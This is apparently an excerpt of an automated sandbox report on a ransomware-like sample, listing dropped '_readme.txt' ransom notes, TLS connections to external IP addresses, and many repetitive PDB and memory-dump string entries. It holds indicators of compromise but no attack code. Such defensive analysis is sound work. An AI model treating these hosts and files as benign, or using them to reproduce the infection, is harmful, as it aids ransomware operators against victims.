                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Unpacked PE file: 5.2.build2.exe.400000.0.unpack
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe File created: C:\_readme.txt
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe File created: C:\$WinREAgent\_readme.txt
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe File created: C:\$WinREAgent\Scratch\_readme.txt
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe File created: C:\Users\user\_readme.txt
                Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49729 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49745 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49762 version: TLS 1.2
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282440855.0000000003C7B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2254323097.0000000003B39000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255092558.0000000003B4C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273727258.0000000003C73000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323157191.0000000003C87000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316085239.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196da
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255239356.0000000003B10000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232801684.0000000003B10000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283227870.0000000003B8A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282602345.0000000003B34000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2274135225.0000000003B56000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2285187489.0000000003B94000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2325051592.000000000403C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\r source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315825658.00000000036E7000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316766566.00000000036EC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295876636.00000000036EC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2311135636.00000000036E7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\]F source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2358481329.0000000003F52000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341385936.0000000003F42000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003BC3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232315956.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\9W source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2254323097.0000000003B39000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255092558.0000000003B4C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255564557.0000000003B5C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\/ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341959833.0000000003B24000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2348441168.0000000003B2B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2342176452.0000000003B27000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\s source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2333405264.0000000003F5B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2358481329.0000000003F52000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341385936.0000000003F42000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbache133408907975188232.txt source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\y\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292648224.0000000003C65000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341825344.0000000003C86000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273490567.0000000003C47000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315115698.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2254663516.0000000003C5D000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320687899.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310618606.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2313914869.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332695677.0000000003C7B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292043905.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2360091492.0000000003C8E000.00000004.00000020.00020000.00000000.sdmp, 
9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282440855.0000000003C7B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273727258.0000000003C73000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323157191.0000000003C87000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316085239.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316719842.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310756662.0000000003C87000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282081320.0000000003CE4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\* source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283589949.0000000003B1B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282602345.0000000003B14000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283629174.0000000003B1F000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2285216220.0000000003B27000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.cdqw' source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003BC3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232315956.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044311129.000000000369A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044529317.00000000036A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315414414.0000000003EA3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315825658.00000000036E7000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316766566.00000000036EC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310523825.0000000003EEC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2311135636.00000000036E7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294187046.0000000003EE3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2309862085.0000000003F03000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292702111.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\UWP4? source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282081320.0000000003C58000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2333405264.0000000003F5B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2358481329.0000000003F52000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341385936.0000000003F42000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\w**s source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273955613.00000000036E1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255008158.00000000036EE000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2274505062.00000000036FA000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2274054462.00000000036EE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323506783.0000000003F3B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323100107.0000000003F23000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2314739889.0000000003F03000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2322324444.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2319577426.0000000003ECB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbL source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.cdqw source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232315956.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293986477.0000000003B27000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295241780.0000000003B2F000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292390530.0000000003B09000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310270639.0000000003B32000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295203158.0000000003B51000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2351367972.0000000003C9A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2340729338.0000000003C97000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2337425529.0000000003C82000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error3.txt source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\0 source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2321203058.0000000003CA7000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282081320.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282440855.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320687899.0000000003CA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2313914869.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2324655611.0000000003CAC000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\t\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2321203058.0000000003CA7000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320687899.0000000003CA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2313914869.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2324655611.0000000003CAC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316130649.0000000003CCD000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\f source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282529154.00000000036A1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2311222602.00000000036A1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294187046.0000000003EE3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284034690.0000000003F2D000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292702111.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\d source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255239356.0000000003B10000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232801684.0000000003B10000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255319462.0000000003B1B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292648224.0000000003C65000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341825344.0000000003C86000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273490567.0000000003C47000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315115698.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2254663516.0000000003C5D000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320687899.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310618606.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2313914869.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332695677.0000000003C7B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292043905.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, 
